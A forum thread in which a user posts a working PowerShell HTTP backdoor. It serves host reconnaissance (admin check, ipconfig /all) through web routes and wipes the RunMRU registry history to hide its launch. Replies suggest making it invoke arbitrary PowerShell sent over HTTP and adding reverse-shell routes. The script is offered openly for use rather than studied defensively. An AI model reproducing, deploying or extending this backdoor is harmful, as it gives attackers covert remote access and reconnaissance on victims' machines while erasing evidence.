Jump to content

powershell infiltration


jOte-

Recommended Posts

Posted

############## powershell http backdoor...

$cHOST= 'localhost'; # '0.0.0.0' needs admin
$cPORT= 8080;

$URL = "http://$($cHOST):$($cPORT)/";

$ROUTES = @{
  "GET /exit" = { EXIT };
  "GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; 
  "GET /ipconfig" = { return "$(& ipconfig 2>&1 | Out-String)" };
  "GET /ipconfigall" = { return "$(& ipconfig /all 2>&1 | Out-String)" };
  "GET /trol/flipscreen" = { return "flipscreen" };
  "GET /trol/switchmousebuttons" = { return "switchmousebuttons" }
}

$LISTENER = New-Object System.Net.HttpListener;
$LISTENER.Prefixes.Add($URL);
$LISTENER.Start();

While ($LISTENER.IsListening) {
  If ($START -eq $null) {
    Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
    $START=1
  }
  $CONTEXT = $LISTENER.GetContext();
  $REQUEST = $CONTEXT.Request;
  $RESPONSE = $CONTEXT.Response;

  $RECEIVED = '{0} {1}' -f $REQUEST.httpMethod, $REQUEST.Url.LocalPath;
  
  $ROUTE = $ROUTES.Get_Item($RECEIVED);
  
  If ($ROUTE -eq $null) {
    $RESPONSE.StatusCode = 404;
  } Else {
    $CONTENT = & $($ROUTE);
    $CONTENT = "<pre>$($CONTENT)</pre>";
    $BUFFER = [System.Text.Encoding]::UTF8.GetBytes($CONTENT);
    $RESPONSE.ContentLength64 = $BUFFER.Length;
    $RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length);
  }
  $RESPONSE.Close();
}

Posted
3 hours ago, jOte- said:

############## powershell http backdoor...

Looks interesting.

2 hours ago, jOte- said:

this is just a proof of concept... im not intending to send full scripts....

Okay.

1 hour ago, jOte- said:

some ppl will understand.... 

Yes.

1 hour ago, jOte- said:

BTW... who is that "thehappydinoanoob??? KIlling my entries with his stupid questions...

No idea.

Posted

Hmm, a dirty web server as a malicious service.  I been experimenting with using httplistener in Powershell as a PSJob to get payload jobs from.  Never thought about using it the way you use it because normally binding to a port in windows requires admin.  Do not know if that applies only to ports < 1024.

To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)

 

Posted
9 hours ago, PoSHMagiC0de said:

To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)

On 3/27/2018 at 6:11 AM, jOte- said:

"GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; 

He has a URL to check for admin or not, however since I don't have the rest of his code I can't tell what else it's doing there.

I knew you would bring up psh. :P
If cmd, why not psh?

Having some other commands like..

GET /ispsh
GET /reversepsh
GET /sendpsh

even with a CLI tool on it would be interesting.

Posted

Of course, if it is psh, I may come a callin.  :-)

 

Actually what I meant for admin check was when running the backdoor it checks if it is being ran with enough permission to open the port.

 

That admin check he is using session for could be in powershell for more accurate results.

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...